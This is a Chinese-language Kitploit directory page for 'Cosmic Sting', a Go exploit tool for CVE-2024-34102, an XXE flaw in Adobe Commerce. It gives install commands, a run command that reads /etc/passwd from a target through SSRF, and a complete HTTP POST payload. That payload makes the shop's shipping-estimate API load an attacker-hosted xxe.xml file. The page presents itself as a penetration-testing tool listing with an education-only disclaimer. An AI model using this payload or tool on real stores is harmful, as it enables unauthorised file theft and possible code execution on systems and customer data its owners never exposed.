Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-34102 — 基于 Go 编写的 CVE-2024-34102 漏洞利用工具,该漏洞是 Adobe Commerce 中的 XXE 漏洞,可导致远程代码执行。支持单个及批量 URL 扫描,并具备 SSRF 文件读取功能。 | Kitploit
工具/GitHubGitHub/kento-sec/cve-2024-34102
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubkento-sec/cve-2024-34102

CVE-2024-34102

基于 Go 编写的 CVE-2024-34102 漏洞利用工具,该漏洞是 Adobe Commerce 中的 XXE 漏洞,可导致远程代码执行。支持单个及批量 URL 扫描,并具备 SSRF 文件读取功能。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Cosmic Sting:CVE-2024-34102 利用工具

Cosmic Sting 是一个基于 Go 的工具,旨在利用 CVE-2024-34102 远程代码执行漏洞。

CVE-2024-34102 详细信息

Adobe Commerce 2.4.7、2.4.6-p5、2.4.5-p7、2.4.4-p8 及更早版本受到 XML 外部实体引用限制不当('XXE')漏洞的影响,该漏洞可能导致任意代码执行。攻击者可通过发送引用外部实体的特制 XML 文档来利用此漏洞。利用此问题无需用户交互。

前提条件

  • Go(1.16 或更高版本)

安装

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. 安装依赖项(如果有):

    root@kitploit:~
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

单个 URL

使用单个 URL 运行工具:

root@kitploit:~
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"

参数

  • -u, --url : 要利用的单个 URL。
  • -f, --file : 通过 SSRF 读取的文件。
  • -l, --list : 包含要利用的 URL 列表的文件。

精心构造的 XML DTD 文件 POST 请求:

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

许可证

本项目未采用任何许可证,仅为个人项目而制作。

贡献

欢迎贡献!如需任何更改,请打开 issue 或提交拉取请求。

免责声明

此工具仅用于教育目的。请负责任地使用它,并且只在你拥有测试权限的系统上使用。

作者

Professor the Hunter --> 在 Twitter 上关注我

CVE-2024-34102

下载工具